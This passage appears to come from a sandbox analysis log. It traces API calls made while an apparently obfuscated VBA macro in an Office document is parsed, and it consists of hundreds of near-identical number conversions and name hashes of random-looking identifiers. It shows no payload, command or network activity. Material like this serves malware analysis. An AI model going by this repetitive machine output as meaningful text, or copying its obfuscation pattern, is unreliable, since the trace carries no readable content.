plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.824] VarI4FromStr (in: strIn="743716625", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.824] VarI4FromStr (in: strIn="459718536", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.824] VarI4FromStr (in: strIn="681483778", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.824] VarI4FromStr (in: strIn="298854687", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.824] VarI4FromStr (in: strIn="249938950", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.824] VarI4FromStr (in: strIn="208729950", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="272712589") returned 10 [0067.824] VarI4FromStr (in: strIn="272712589", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.824] VarI4FromStr (in: strIn="457274662", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="700686671") returned 10 [0067.824] VarI4FromStr (in: strIn="700686671", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.824] VarI4FromStr (in: strIn="159827783", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="828009162") returned 10 [0067.825] VarI4FromStr (in: strIn="828009162", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.825] VarI4FromStr (in: strIn="446451898", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.825] VarI4FromStr (in: strIn="111140530", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.825] VarI4FromStr (in: strIn="146317442", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.825] VarI4FromStr (in: strIn="943462790", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.825] VarI4FromStr (in: strIn="693629935", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.825] VarI4FromStr (in: strIn="122339676", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.825] VarI4FromStr (in: strIn="750505761", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.825] VarI4FromStr (in: strIn="217782767", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.825] VarI4FromStr (in: strIn="29348950", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="774338328") returned 10 [0067.826] VarI4FromStr (in: strIn="774338328", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.826] VarI4FromStr (in: strIn="808625216", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="630010399") returned 10 [0067.826] VarI4FromStr (in: strIn="630010399", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.826] VarI4FromStr (in: strIn="988332378", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="808099945") returned 10 [0067.826] VarI4FromStr (in: strIn="808099945", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.826] VarI4FromStr (in: strIn="872413769", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.826] VarI4FromStr (in: strIn="941513489", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.826] VarI4FromStr (in: strIn="965871418", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.826] VarI4FromStr (in: strIn="615236422", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.827] VarI4FromStr (in: strIn="129412008", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.827] VarI4FromStr (in: strIn="393974966", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.827] VarI4FromStr (in: strIn="564296029", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.827] VarI4FromStr (in: strIn="986785745", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.827] VarI4FromStr (in: strIn="425283897", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.827] VarI4FromStr (in: strIn="560851108", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.827] VarI4FromStr (in: strIn="802818939", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.827] VarI4FromStr (in: strIn="116112239", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.828] IMalloc:Realloc (This=0x7fefec05380, pv=0xafc1c10, cb=0x2400) returned 0xafc2e20 [0067.828] CExposedStream::Read () returned 0x0 [0067.828] CExposedStream::Read () returned 0x0 [0067.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jDAAQxA") returned 0x1056ad [0067.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="368831779") returned 10 [0067.828] VarI4FromStr (in: strIn="368831779", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CU11AADQ") returned 0x10d932 [0067.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jBBDAw") returned 0x108a63 [0067.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GUAAAA") returned 0x1044c5 [0067.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="578136444") returned 10 [0067.829] VarI4FromStr (in: strIn="578136444", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.829] VarI4FromStr (in: strIn="10528346", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.829] VarI4FromStr (in: strIn="885420559", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.829] VarI4FromStr (in: strIn="650063007", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.829] VarI4FromStr (in: strIn="246990694", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IUAAADk") returned 0x10480a [0067.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tAA4UB") returned 0x10c314 [0067.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="808071969") returned 10 [0067.829] VarI4FromStr (in: strIn="808071969", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.829] VarI4FromStr (in: strIn="768043385", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aBw1Ac") returned 0x10ca21 [0067.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="955291431") returned 10 [0067.829] VarI4FromStr (in: strIn="955291431", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.829] VarI4FromStr (in: strIn="570234794", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="707187382") returned 10 [0067.829] VarI4FromStr (in: strIn="707187382", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.830] VarI4FromStr (in: strIn="436724196", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="756184280") returned 10 [0067.830] VarI4FromStr (in: strIn="756184280", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EAZkA_B") returned 0x107fa8 [0067.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="115227885") returned 10 [0067.830] VarI4FromStr (in: strIn="115227885", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tAoAAx") returned 0x10d52c [0067.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nAAAAA") returned 0x107d70 [0067.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tAkkAB") returned 0x10f3d9 [0067.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ukAcQ_") returned 0x10dc92 [0067.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tAxACAU") returned 0x104e8c [0067.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="685078661") returned 10 [0067.830] VarI4FromStr (in: strIn="685078661", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zoUAAoCA") returned 0x10e4c1 [0067.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PADAAAo") returned 0x10ee42 [0067.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HADBXB") returned 0x104ef2 [0067.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="992232334") returned 10 [0067.831] VarI4FromStr (in: strIn="992232334", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.831] VarI4FromStr (in: strIn="4706886", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.831] VarI4FromStr (in: strIn="684106564", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.831] VarI4FromStr (in: strIn="270957839", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.831] VarI4FromStr (in: strIn="727357579", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EAoUUBU") returned 0x105a13 [0067.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CZAwAA") returned 0x1033be [0067.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="943904907") returned 10 [0067.831] VarI4FromStr (in: strIn="943904907", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.831] VarI4FromStr (in: strIn="58946949", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bGoCox") returned 0x10b4e8 [0067.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="504007818") returned 10 [0067.831] VarI4FromStr (in: strIn="504007818", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.832] VarI4FromStr (in: strIn="449745538", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="433019669") returned 10 [0067.832] VarI4FromStr (in: strIn="433019669", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.832] VarI4FromStr (in: strIn="864365796", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="250717389") returned 10 [0067.832] VarI4FromStr (in: strIn="250717389", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="roAQXo") returned 0x102bb8 [0067.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="755905713") returned 10 [0067.832] VarI4FromStr (in: strIn="755905713", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HDx4Ack") returned 0x1090f1 [0067.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qDGwwDBD") returned 0x10ef86 [0067.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qDcADA") returned 0x1002e6 [0067.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.833] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JADwBA") returned 0x10e423 [0067.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="168555660") returned 10 [0067.833] VarI4FromStr (in: strIn="168555660", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.833] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JUBBwAc") returned 0x10475c [0067.833] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="toDcAAA") returned 0x10a6a7 [0067.833] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AAZBBQ") returned 0x10a9e7 [0067.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="690061401") returned 10 [0067.833] VarI4FromStr (in: strIn="690061401", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.833] VarI4FromStr (in: strIn="805161657", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.833] VarI4FromStr (in: strIn="914136780", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.833] VarI4FromStr (in: strIn="434191081", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.833] VarI4FromStr (in: strIn="581512579", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.833] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DBQUUD") returned 0x10f518 [0067.833] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.833] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ncAo_UG") returned 0x1058d0 [0067.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="203261006") returned 10 [0067.833] VarI4FromStr (in: strIn="203261006", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.833] VarI4FromStr (in: strIn="7179260", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.833] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.833] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hAAAD4kA") returned 0x1086ee [0067.833] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="159749329") returned 10 [0067.833] VarI4FromStr (in: strIn="159749329", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.833] VarI4FromStr (in: strIn="432309853", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.834] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 